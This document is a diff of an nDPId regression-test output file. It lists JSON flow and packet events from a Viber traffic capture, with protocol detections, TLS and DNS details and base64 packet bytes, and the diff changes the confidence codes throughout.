00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1527155646855,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155646855,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0QKpAAEAGdTnAqAARrNkXTqq2Abu2kyjV4Kxf1YAQAq3p2QAAAQEICgAhaH6jjizL"} -00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646850,"flow_last_seen":1527155646860,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1527155646860,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155646850,"flow_last_seen":1527155646862,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":679,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1527155646862,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"67619a80665d7ab92d1041b1d11f9164","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646850,"flow_last_seen":1527155646860,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1527155646860,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155646850,"flow_last_seen":1527155646862,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":679,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1527155646862,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"67619a80665d7ab92d1041b1d11f9164","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646968,"flow_last_seen":1527155646968,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1527155646968,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1527155646968,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1527155646968,"pkt":"AQBeAAD7MAdNo1+nCABFAABZHwxAAP8RutLAqAAR4AAA+xTpFOkARSvHAAQAAAACAAAAAAAACV84MDU3NDFDOQRfc3ViC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAcAbAAwAAQ=="} -00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646968,"flow_last_seen":1527155646968,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1527155646968,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": 
{"answer":"_805741c9._sub._googlecast._tcp.local"}} +00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646968,"flow_last_seen":1527155646968,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1527155646968,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_805741c9._sub._googlecast._tcp.local"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1527155646968,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1527155646968,"pkt":"AQBeAAD7MAdNo1+nCABFAABZHwxAAP8RutLAqAAR4AAA+xTpFOkARSvHAAQAAAACAAAAAAAACV84MDU3NDFDOQRfc3ViC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAcAbAAwAAQ=="} 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1527155647500,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1527155647500,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1527155647500,"pkt":"MzMAAAACMAdNo1+nht1gAAAAABA6\/\/6AAAAAAAAAMgdN\/\/6jX6f\/AgAAAAAAAAAAAAAAAAAChQDAigAAAAABATAHTaNfpw=="} -00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1527155647500,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1527155647500,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1527155647500,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1527155647500,"pkt":"MzMAAAACMAdNo1+nht1gAAAAABA6\/\/6AAAAAAAAAMgdN\/\/6jX6f\/AgAAAAAAAAAAAAAAAAAChQDAigAAAAABATAHTaNfpw=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648481,"flow_last_seen":1527155648481,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1527155648481,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1527155648481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1527155648481,"pkt":"AA6OMNv9MAdNo1+nCABFAABEJLZAAEARlILAqAARwKgAD61YADUAMDkH00kBAAABAAAAAAAAB3ZlbmV0aWEDaWFkBmFwcGJveQNjb20AAAEAAQ=="} 
-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648481,"flow_last_seen":1527155648481,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1527155648481,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648481,"flow_last_seen":1527155648481,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1527155648481,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1527155648506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":183,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":183,"pkt_l4_len":149,"thread_ts_msec":1527155648506,"pkt":"MAdNo1+nAA6OMNv9CABFAACpXKlAAEARXCrAqAAPwKgAEQA1rVgAlY7c00mBgAABAAUAAAAAB3ZlbmV0aWEDaWFkBmFwcGJveQNjb20AAAEAAcAMAAUAAQAAAQIAGQF5A3NzbAZnbG9iYWwGZmFzdGx5A25ldADANAABAAEAAAAdAASXZQGCwDQAAQABAAAAHQAEl2VBgsA0AAEAAQAAAB0ABJdlgYLANAABAAEAAAAdAASXZcGC"} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":211,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155648506,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.1.130"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":211,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155648506,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.1.130"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648513,"flow_last_seen":1527155648513,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155648513,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1527155648513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155648513,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8cjBAAEAGbuvAqAARl2UBgtnCAbvgBRgtAAAAAKAC\/\/+wcAAAAgQFtAQCCAoAIWodAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1527155648523,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155648523,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAADoG5xuXZQGCwKgAEQG72cJzm\/EW4AUYLqAScSBKVAAAAgQFtAQCCArIDMgpACFqHQEDAwk="} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1527155648526,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155648526,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0cjFAAEAGbvLAqAARl2UBgtnCAbvgBRguc5vxF4AQAq3nkgAAAQEICgAhaiDIDMgp"} -00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155648513,"flow_last_seen":1527155648533,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155648533,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"venetia.iad.appboy.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155648513,"flow_last_seen":1527155648533,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155648533,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"venetia.iad.appboy.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00848{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":217,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155648513,"flow_last_seen":1527155648544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1527155648544,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"venetia.iad.appboy.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1527155666982,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1527155666982,"pkt":"AQBeAAD7MAdNo1+nCABFAABZIsxAAP8RtxLAqAAR4AAA+xTpFOkARSvGAAUAAAACAAAAAAAACV84MDU3NDFDOQRfc3ViC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAcAbAAwAAQ=="} 
00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 
@@ -95,10 +97,10 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1527155670632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155670632,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8WoBAAEAGCJrAqAAREskEILFwAbuQXSU3AAAAAKAC\/\/+HxQAAAgQFtAQCCAoAIX+3AAAAAAEDAwc="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":200000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1527155670640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAEdfMxAAEAR5NnAqAAREskEILhDHzEBCRHz7fYBAAUArBk1jI9k5EcHridUEQCowEO4MgAAAEMBABABAK45kpFjAQAAAAAAACXfTU7hzTcbXJq8JtnTC0sBuzmzAAAAAAAAAAADAAEAZgIAZwABeAAAAAAAAIAAvcYFlBohustZk1e\/8OyZiSqP86k39WGwDkG7f\/rMnT2tcfHi3zlsEfu0kKTP5bAY2qxB7\/oc6uBQ0Wmie0yDB6f1EwNZ4BrIBNZIXKB4sgy96MQL790EZYw7fY9vCydMCFozrGypXQPtcVrV5xCrsYqA8zuDlnCD1lV04sfnGYMAAAAAAAAAAEcFAAA4AAAAEABBbmRyb2lkLDguOS4wLjIAAAA="} 
-00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":200000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":200000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1527155670640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAA+fM1AAEAR5bfAqAAREskEILhDHzMAKi7T7fYZAKwZNYyPZORHJd9NTuHNNxtcmrwm2dMLSwG7ObMAAA=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 